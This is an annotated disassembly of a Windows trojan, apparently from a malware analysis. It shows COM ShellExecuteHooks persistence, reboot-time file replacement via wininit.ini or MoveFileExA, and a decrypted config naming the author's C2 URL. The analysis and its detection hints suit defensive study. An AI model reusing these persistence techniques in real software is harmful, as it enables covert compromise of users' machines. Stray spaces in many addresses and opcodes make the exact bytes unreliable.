00404D43 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; |
00404D46 |. 50 push eax ; |hKey
00404D47 |. E8 40F 6FFFF call <jmp.&advapi32.RegSetValue>; /RegSetValueExA
00404D 4C |. 8B45 FC mov eax,dword ptr ss:[ebp-4]
00404D 4F |. 50 push eax ; /hKey
00404D50 |. E8 27F 6FFFF call <jmp.&advapi32.RegCloseKey>; /RegCloseKey
00404D55 |. 5E pop esi
00404D56 |. 5B pop ebx
00404D57 |. 59 pop ecx
00404D58 |. 59 pop ecx
00404D59 |. 5D pop ebp
00404D 5A /. C2 0400 retn 4
00404D5D 8D40 00 lea eax,dword ptr ds:[eax]
; 00404D60: register the dropped DLL as a COM in-proc server under HKEY_CLASSES_ROOT (eax=80000000).
; [ebp+8] = DLL path. Three calls to 00404D00 write, in order:
;   CLSID\{754FB7D8-...}                     (default) = <string at 00404E14, not dumped>
;   CLSID\{754FB7D8-...}\InProcServer32      (default) = <DLL path>
;   CLSID\{754FB7D8-...}\InProcServer32      ThreadingModel = "Apartment"
; This is the CLSID the ShellExecuteHooks entry at 004058F5 points at, so Explorer will load the DLL.
00404D60 /$ 55 push ebp
00404D61 |. 8BEC mov ebp,esp
00404D63 |. 53 push ebx
00404D64 |. BB 84764000 mov ebx,SysAuto1.00407684
; ebx = address of a global string used to build the subkey path.
00404D69 |. 8BC3 mov eax,ebx
00404D6B |. BA E44D4000 mov edx,SysAuto1.00404DE4 ; ASCII "CLSID/{754FB7D8-B8FE-4810-B363-A788CD 060F 1F }"
00404D70 |. E8 E3E7FFFF call SysAuto1.00403558
; 00403558(eax=dest, edx=src): string assignment (presumed Delphi LStrAsg) — *[407684] := "CLSID\{...}".
00404D75 |. 68 144E4000 push SysAuto1.00404E14
00404D 7A |. 8B03 mov eax,dword ptr ds:[ebx]
00404D 7C |. E8 03EAFFFF call SysAuto1.00403784
00404D81 |. 8BD0 mov edx,eax ; |
00404D83 |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; |
00404D88 |. B8 00000080 mov eax,80000000 ; |
00404D8D |. E8 6EFFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
; 00404E14 is used both as value name and value data here; an empty string would mean "(Default)" — not dumped, confirm.
00404D92 |. 8BC3 mov eax,ebx
00404D94 |. BA 204E4000 mov edx,SysAuto1.00404E20 ; ASCII "/InProcServer32"
00404D99 |. E8 8AE8FFFF call SysAuto1.00403628
; 00403628(eax=dest, edx=suffix): append (presumed Delphi LStrCat) — *[407684] += "\InProcServer32".
00404D9E |. 8B45 08 mov eax,dword ptr ss:[ebp+8]
00404DA1 |. 50 push eax
00404DA2 |. 8B03 mov eax,dword ptr ds:[ebx]
00404DA4 |. E8 DBE9FFFF call SysAuto1.00403784
00404DA9 |. 8BD0 mov edx,eax ; |
00404DAB |. B9 144E4000 mov ecx,SysAuto1.00404E14 ; |
00404DB0 |. B8 00000080 mov eax,80000000 ; |
00404DB5 |. E8 46FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
00404DBA |. 68 304E4000 push SysAuto1.00404E30 ; ASCII "Apartment"
00404DBF |. 8B03 mov eax,dword ptr ds:[ebx]
00404DC1 |. E8 BEE9FFFF call SysAuto1.00403784
00404DC6 |. 8BD0 mov edx,eax ; |
00404DC8 |. B9 3C 4E4000 mov ecx,SysAuto1.00404E 3C ; |ASCII "ThreadingModel"
00404DCD |. B8 00000080 mov eax,80000000 ; |
00404DD2 |. E8 29FFFFFF call SysAuto1.00404D00 ; /SysAuto1.00404D00
00404DD7 |. 5B pop ebx
00404DD8 |. 5D pop ebp
00404DD9 /. C2 0400 retn 4
根据操作系统版本选择改名方式:非NT系统修改wininit.ini的[rename]节,NT系统则调用MoveFileExA
; 00404E4C: platform probe. Builds an OSVERSIONINFOA (0x94 bytes, dwOSVersionInfoSize at offset 0)
; on the stack, calls GetVersionExA and returns al = 1 when dwPlatformId ([esp+10]) != 2, i.e. the
; OS is NOT VER_PLATFORM_WIN32_NT (Windows 9x/Me). Caller 00404E70 uses this to pick wininit.ini vs MoveFileExA.
00404E 4C /$ 81C 4 6CFFFFFF add esp,-94
00404E52 |. C70424 940000>mov dword ptr ss:[esp],94
00404E59 |. 54 push esp ; /pVersionInformation
00404E 5A |. E8 9DF5FFFF call <jmp.&KERNEL32.GetVersionE>; /GetVersionExA
; Return value of GetVersionExA is ignored; on failure the platform field is uninitialised stack data.
00404E 5F |. 837C 24 10 02 cmp dword ptr ss:[esp+10],2
00404E64 |. 0F 95C 0 setne al
00404E67 |. 81C 4 94000000 add esp,94
00404E6D /. C3 retn
00404E6E 8BC0 mov eax,eax
; 00404E70: replace a file at next reboot. Convention (from the caller at 00405809):
;   eax = destination (ebx, the live System64.Sys), edx = source (esi, the staged System64.Tao).
; Non-NT: write "<dest short path>=<source short path>" under [rename] in wininit.ini.
; NT:     MoveFileExA(source, dest, 5) — MOVEFILE_REPLACE_EXISTING|MOVEFILE_DELAY_UNTIL_REBOOT.
; Both paths defer the swap until reboot, which is why the PathFileExistsA test at 004057DF routes
; an undeletable (in-use) DLL here. Detection: wininit.ini [rename] entries and PendingFileRenameOperations.
00404E70 /$ 53 push ebx
00404E71 |. 56 push esi
00404E72 |. 81C 4 F 4FDFFFF add esp, -20C
; Two MAX_PATH (0x104) buffers: source short path at frame+0x105, destination short path at frame+0.
00404E78 |. 8BF2 mov esi,edx
00404E 7A |. 8BD8 mov ebx,eax
00404E 7C |. E8 CBFFFFFF call SysAuto1.00404E 4C
00404E81 |. 84C 0 test al,al
00404E83 |. 74 4F je short SysAuto1.00404ED4
; al == 0 -> NT platform -> MoveFileExA branch at 00404ED4.
00404E85 |. 68 04010000 push 104
00404E 8A |. 8D8424 090100>lea eax,dword ptr ss:[esp+109]
00404E91 |. 50 push eax
00404E92 |. 8BC6 mov eax,esi
00404E94 |. E8 EBE8FFFF call SysAuto1.00403784
00404E99 |. 50 push eax ; |LongPath
00404E 9A |. E8 4DF5FFFF call <jmp.&KERNEL32.GetShortPat>; /GetShortPathNameA
; GetShortPathNameA(source) -> upper buffer; 8.3 names are required by the wininit.ini [rename] parser.
00404E 9F |. 68 04010000 push 104
00404EA4 |. 8D4424 04 lea eax,dword ptr ss:[esp+4]
00404EA8 |. 50 push eax
00404EA9 |. 8BC3 mov eax,ebx
00404EAB |. E8 D4E8FFFF call SysAuto1.00403784
00404EB0 |. 50 push eax ; |LongPath
00404EB1 |. E8 36F 5FFFF call <jmp.&KERNEL32.GetShortPat>; /GetShortPathNameA
; GetShortPathNameA(destination) -> lower buffer. Neither call's return value is checked.
00404EB6 |. 68 F 44E4000 push SysAuto1.00404EF4 ; /FileName = "wininit.ini"
00404EBB |. 8D8424 090100>lea eax,dword ptr ss:[esp+109] ; |
00404EC2 |. 50 push eax ; |String
00404EC3 |. 8D4424 08 lea eax,dword ptr ss:[esp+8] ; |
00404EC7 |. 50 push eax ; |Key
00404EC8 |. 68 004F 4000 push SysAuto 1.00404F 00 ; |Section = "rename"
00404ECD |. E8 9AF5FFFF call <jmp.&KERNEL32.WritePrivat>; /WritePrivateProfileStringA
; WritePrivateProfileStringA("rename", Key=dest short path, String=source short path, "wininit.ini")
00404ED2 |. EB 17 jmp short SysAuto1.00404EEB
00404ED4 |> 6A 05 push 5
; 5 = MOVEFILE_REPLACE_EXISTING (1) | MOVEFILE_DELAY_UNTIL_REBOOT (4)
00404ED6 |. 8BC3 mov eax,ebx
00404ED8 |. E 8 A 7E8FFFF call SysAuto1.00403784
00404EDD |. 50 push eax
00404EDE |. 8BC6 mov eax,esi
00404EE0 |. E8 9FE8FFFF call SysAuto1.00403784
00404EE5 |. 50 push eax ; |ExistingName
00404EE6 |. E8 39F 5FFFF call <jmp.&KERNEL32.MoveFileExA>; /MoveFileExA
; MoveFileExA(lpExistingFileName=source, lpNewFileName=destination, dwFlags=5); result not checked.
00404EEB |> 81C 4 0C 020000 add esp, 20C
00404EF1 |. 5E pop esi
00404EF2 |. 5B pop ebx
00404EF3 /. C3 retn
中间还有一段代码用于解密作者隐藏的数据,下面是解密出的内容:
其中包含病毒作者的网址及其他数据
009B 002F 00 CB FB B 4 F 3 D2 AF 0D 0A 32 30 30 他大爷..200
009B 003F 37 2D 36 2D 39 20 31 35 3A 32 34 3A 32 36 0D 0A 7-6-9 15:24:26..
009B 004F 36 34 32 43 32 42 33 35 0D 0A 4B 65 79 5F 4B 65 642C 2B35..Key_Ke
009B 005F 79 0D 0A 36 30 0D 0A 59 65 73 0D 0A 59 65 73 0D y..60..Yes..Yes.
009B 006F 0A 59 65 73 0D 0A 68 74 74 70 3A 2F 2F 77 77 77 .Yes..http://www
009B 007F 2E 70 6C 69 6E 63 65 2E 6E 65 74 2F 58 58 2F 6E .plince.net/XX/n
009B 008F 6E 2E 61 73 70 0D 0A 78 78 78 78 0D 0A 68 74 74 n.asp..xxxx..htt
009B 009F 70 3A 2F 2F 77 77 77 2E 70 6C 69 6E 63 65 2E 6E p://www.plince.n
009B00AF 65 74 2F 58 58 2F 6E 6E 2E 61 73 70 0D 0A 17 E3 et/XX/nn.asp..
www.plince.net/XX/nn.asp